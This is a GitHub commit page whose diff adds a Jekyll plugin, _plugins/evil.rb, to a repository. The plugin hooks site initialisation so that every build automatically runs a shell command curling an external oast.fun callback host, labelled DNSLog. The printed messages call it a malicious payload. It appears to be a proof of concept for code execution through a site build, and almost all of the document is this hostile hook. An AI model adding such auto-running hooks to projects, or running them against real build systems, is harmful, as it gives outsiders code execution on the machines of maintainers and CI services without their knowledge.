Skip to content

Commit 017d9b5

Browse files
author
transferwise
authored
Create evil.rb
Signed-off-by: transferwise <[email protected]>
1 parent f61c6f5 commit 017d9b5

File tree

1 file changed

+9
-0
lines changed

1 file changed

+9
-0
lines changed

_plugins/evil.rb

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
# _plugins/evil.rb
2+
require 'open3'
3+
4+
Jekyll::Hooks.register :site, :after_init do |site|
5+
puts "Executing malicious payload..."
6+
# DNSLog
7+
stdout, stderr, status = Open3.capture3("curl http://bqiehrpshxqkxlzvdxgc32wowysc7once.oast.fun")
8+
puts "Payload executed."
9+
end

0 commit comments

Comments
 (0)